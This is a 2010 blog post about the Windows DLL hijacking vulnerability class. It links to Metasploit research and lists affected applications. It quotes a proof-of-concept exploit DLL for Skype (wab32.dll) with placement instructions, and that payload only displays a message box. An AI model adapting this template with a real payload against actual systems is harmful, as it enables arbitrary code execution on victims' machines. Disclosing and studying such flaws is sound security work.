Exploiting DLL Hijacking Flaws‏

Posted: 27 August, 2010 in cyber culture, english, life, new, security
Tags: , , , , ,

Have you already heard about the DLL pre-loading/hijacking problem which effects more than 200 Windows applications? This vulnerability is triggered when a vulnerable file type is opened from within a directory controlled by the attacker!

HD Moore (Metasploit) explains the problem and adds a *scanner* into the metasploit framework. Please read his blog entry here (tool for scanning the local machine)

* http://blog.metasploit.com/2010/08/better-faster-stronger.html
* http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html

glafkos from Astalavista is now publishing exploit codes for various vulnerable file types:
* Skype
* Adobe Illustrator
* Adobe InDesign
* Adobe OnLocation
* Adobe Premium Pro
* Firefox <= 3.6.8
* Teamviewer

======== EXAMPLE OF A POC (SKYPE) ===============================
/*
Exploit Title: Skype <= 4.2.0.169 DLL Hijacking Exploit (wab32.dll)
Date: August 25, 2010
Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
Version: Latest Skype v4.2.0.169
Tested on: Windows 7 x64 Ultimate
Vulnerable extensions: .skype
Greetz: Astalavista, OffSEC, Exploit-DB
Notes: Create folders %commonprogramfiles%\system and place wab32.dll
       %commonprogramfiles(x86)% on x64 bit */
 
 
#include <windows.h>
#define DllExport __declspec (dllexport)
 
BOOL WINAPI  DllMain (
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
  dll_hijack();
  return 0;
}
 
int dll_hijack()
{
  MessageBox(0, "Skype DLL Hijacking!", "DLL Message", MB_OK);
  return 0;
}
 
===============================================
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s